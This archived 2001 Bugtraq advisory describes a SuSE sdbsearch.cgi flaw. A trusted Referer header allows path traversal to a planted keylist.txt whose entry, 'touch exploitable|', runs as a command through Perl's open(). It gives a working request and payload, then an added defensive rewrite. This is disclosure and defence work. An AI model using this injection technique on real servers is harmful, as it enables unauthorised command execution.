The OpenNET Project
suse: sdbsearch.cgi vulnerability
Date: Thu, 2 Aug 2001 01:09:42 +0200 (CEST)
From: Maurycy Prodeus <z33d@eth-security.net>
To: bugtraq@securityfocus.com
Subject: suse: sdbsearch.cgi vulnerability

Hello,
I found a weakness in the sdbsearch.cgi script which is a part of the Suse distribution.
This is a perl script and since Suse 7.1 they have introduced some form of
protection (the interpreter is called with taint checking). However, I think
it isn't enough and this bug may still be dangerous.

Sdbsearch.cgi trusts the content of the HTTP_REFERER variable, which is set by the client
side during http requests. A piece of this data is used to locate the file with
keywords and referenced files. If there is a possibility to put such a file
on the attacked host (i.e. upload through ftpd) with special content, sdbsearch
will use open() to get access to the matched files. So we can make the standard open()
pipe based attack (only without the -T option). The name of the uploaded file has to
be "keylist.txt" because we manipulate only the pathname, using double dots.

The proof of concept is very simple: just create a harmful keylist.txt, for instance
in the /tmp directory, and send a request to the http server like this:

GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp
(very deep traversal because we don't know what is DOCUMENT_ROOT)

and create example content for our /tmp/keylist.txt like this:
$ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt

After a successful attempt there will be an "exploitable" file in the /tmp directory.

Affected systems:
	Suse 6.x 7.x (7.1 and 7.2 have taint protection, but even then
	we can pass sdbsearch files which shouldn't be read)
Patch: 
	Just filter the HTTP_REFERER variable.

- z33d

-- 
je Art_of_self_destruct
pushl %eax
pushl %eax
pushl %ebx
pushl %ebx
 popl %ecx	----== http://z33d.eth-security.net ==----
pushl %eax
pushl %eax
pushl %ebx
pushl %ebx
Art_of_self_destruct:
hlt
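A defensive rewrite of the file-access step described in the post, added to this archive entry and not taken from SuSE's sdbsearch.cgi: it derives only a hostname from HTTP_REFERER, confines the resulting directory to a fixed base, and uses three-argument open with an explicit read mode, so a keylist entry such as "touch exploitable|" is treated as a literal filename rather than a pipe. The base directory, the function names and the NUL-separated keylist record format (taken from the proof of concept) are assumptions.

```perl
#!/usr/bin/perl -T
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;

# Assumed base directory holding the per-host keylist.txt files (not from the advisory).
my $BASE = '/usr/share/doc/sdb';

# Derive a subdirectory from the Referer host part only; anything that is not a
# plain hostname is rejected, so "../" sequences never reach the filesystem.
sub referer_dir {
    my ($referer) = @_;
    return undef unless defined $referer;
    my ($host) = $referer =~ m{^https?://([A-Za-z0-9.-]+)(?:[:/]|$)};
    return undef unless defined $host;
    my $dir = realpath(File::Spec->catdir($BASE, $host));
    # Confine to $BASE even if a symlink or a ".." host would lead elsewhere.
    return undef unless defined $dir && index($dir, "$BASE/") == 0;
    return $dir;
}

# Look up $keyword in keylist.txt and open the referenced file read-only.
# Returns a filehandle, or undef when nothing matches or the path escapes $dir.
sub open_match {
    my ($dir, $keyword) = @_;
    open(my $kl, '<', "$dir/keylist.txt") or return undef;
    while (my $line = <$kl>) {
        chomp $line;
        my ($key, $file) = split /\0/, $line, 2;   # assumed record layout: key NUL filename
        next unless defined $file && $key eq $keyword;
        # Three-argument open with an explicit '<' mode: a trailing '|' or a
        # leading '>' in $file is part of the filename, never a command.
        my $path = realpath(File::Spec->catfile($dir, $file));
        return undef unless defined $path && index($path, "$dir/") == 0;
        open(my $fh, '<', $path) or return undef;
        return $fh;
    }
    return undef;
}

# Example wiring for a CGI environment (the parameter name follows the post's request).
my $dir = referer_dir($ENV{HTTP_REFERER});
my ($kw) = (defined $ENV{QUERY_STRING} ? $ENV{QUERY_STRING} : '') =~ /stichwort=([A-Za-z0-9_-]+)/;
my $fh = (defined $dir && defined $kw) ? open_match($dir, $kw) : undef;
print "Content-Type: text/plain\r\n\r\n";
print defined $fh ? <$fh> : "no match\n";
```

With the Referer from the post, referer_dir returns undef because the host regex stops at the first "/", and a keylist entry ending in "|" is opened as a plain file name that does not exist, so nothing is executed.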
